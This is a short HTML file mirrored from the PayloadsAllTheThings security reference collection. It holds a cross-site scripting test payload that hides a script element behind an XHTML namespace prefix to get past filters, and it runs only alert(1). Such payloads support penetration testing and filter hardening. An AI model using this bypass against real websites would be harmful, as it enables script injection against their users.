mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 23:02:46 +00:00
6 lines
141 B
HTML
6 lines
141 B
HTML
|
<html>
|
||
|
<head></head>
|
||
|
<body>
|
||
|
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
|
||
|
</body>
|
||
|
</html>
|